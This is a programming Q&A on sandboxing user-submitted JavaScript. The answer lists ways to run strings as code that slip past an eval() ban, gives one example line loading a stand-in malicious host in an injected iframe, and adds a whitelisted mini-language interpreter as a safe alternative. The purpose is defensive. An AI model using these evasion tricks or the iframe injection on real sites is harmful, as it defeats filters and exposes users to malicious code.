How can I make external code 'safe' to run? Just ban eval()?


Question

I'd like to be able to allow community members to supply their own JavaScript code for others to use, because the users' imaginations are collectively far greater than anything I could think of.

But this raises the inherent question of security, particularly when the purpose is to allow external code to run.

So, can I just ban eval() from submissions and be done with it? Or are there other ways to evaluate code or cause mass panic in JavaScript?

There are other things to disallow, but my main concern is that unless I can prevent strings from being executed, whatever other filters I put in for specific methods can be circumvented. Doable, or do I have to resort to demanding that the author supplies a web service interface?

Answer


"Or are there other ways to evaluate code"

You can't filter out calls to eval() at a script-parsing level because JavaScript is a Turing-complete language in which it is possible to obfuscate calls. E.g. see svinto's workaround. You could hide window.eval by overwriting it with a null value, but there are indeed other ways to evaluate code, including (just off the top of my head):


  • new Function('code')()
  • document.write('%3Cscript>code%3C/script>')
  • document.createElement('script').appendChild(document.createTextNode('code'))
  • window.setTimeout('code', 0);
  • window.open(...).eval('code')
  • location.href='javascript:code'
  • in IE, style/node.setExpression('someproperty', 'code')
  • in some browsers, node.onsomeevent= 'code';
  • in older browsers, Object.prototype.eval('code')

"or cause mass panic in JavaScript?"

Well, createElement('iframe').src='http://evil.iframeexploitz.ru/aff=2345' is one of the worst attacks you can expect... but really, when a script has control, it can do anything a user can on your site. It can make them post "I'm a big old paedophile!" a thousand times on your forums and then delete their own account. For example.


"do I have to resort to demanding that the author supplies a web service interface?"

Yes, or:


  • do nothing, and let users who want this feature download GreaseMonkey
  • review each script submission yourself
  • use your own (perhaps JavaScript-like) mini-language that you actually control

An example of the latter that may interest you is Google Caja. I'm not entirely sure I'd trust it; it's a hard job and they've certainly had some security holes so far, but it's about the best there is if you really must take this approach.
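The third option in working form, as an added example that is not part of the answer above or of Caja: a small expression mini-language with its own interpreter, so untrusted text is only ever parsed by this code and never handed to eval(), Function, setTimeout or any host object. The grammar, SAFE_FUNCS whitelist and function names are my own assumptions.

```javascript
// Added example (not from the answer above): option three, a mini-language with its own
// interpreter. Untrusted text is only parsed here and never reaches eval(), Function,
// setTimeout or any host object, so none of the tricks listed above can be expressed.
// Supports numbers, + - * /, parentheses, host-supplied variables and whitelisted calls.
const SAFE_FUNCS = { abs: Math.abs, max: Math.max, min: Math.min, sqrt: Math.sqrt };
const hasOwn = (obj, key) => Object.prototype.hasOwnProperty.call(obj, key);
function tokenize(src) {
  const re = /\s*(?:(\d+(?:\.\d+)?)|([A-Za-z_]\w*)|([-+*/(),]))/y; // sticky: no gaps allowed
  const tokens = [], text = src.trim();
  while (re.lastIndex < text.length) {
    const m = re.exec(text);
    if (!m) throw new Error('illegal character in: ' + text); // '.', '[', quotes, ...
    tokens.push(m[1] !== undefined ? Number(m[1]) : m[2] !== undefined ? m[2] : m[3]);
  }
  return tokens;
}

function evaluate(src, vars = {}) { // recursive descent; `vars` is all the script can read
  const toks = tokenize(src); let pos = 0;
  const peek = () => toks[pos], next = () => toks[pos++];
  function expr() {
    let v = term();
    while (peek() === '+' || peek() === '-') v = next() === '+' ? v + term() : v - term();
    return v;
  }
  function term() {
    let v = factor();
    while (peek() === '*' || peek() === '/') v = next() === '*' ? v * factor() : v / factor();
    return v;
  }
  function factor() {
    const t = next();
    if (t === undefined) throw new Error('unexpected end of input');
    if (t === '(') { const v = expr(); if (next() !== ')') throw new Error('expected )'); return v; }
    if (typeof t === 'number') return t;
    if (peek() === '(') { // call: name must be an own key of SAFE_FUNCS (so no toString etc.)
      next();
      const args = peek() === ')' ? [] : [expr()];
      while (peek() === ',') { next(); args.push(expr()); }
      if (next() !== ')') throw new Error('expected )');
      if (!hasOwn(SAFE_FUNCS, t)) throw new Error('unknown function ' + t);
      return SAFE_FUNCS[t](...args);
    }
    if (!hasOwn(vars, t)) throw new Error('unknown variable ' + t); // no window/document/globalThis
    return vars[t];
  }
  const result = expr();
  if (pos !== toks.length) throw new Error('unexpected token ' + peek());
  return result;
}
```

Anything outside the grammar (property access, strings, brackets, unknown names) is rejected by the tokenizer or the own-key checks rather than silently reaching the host.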
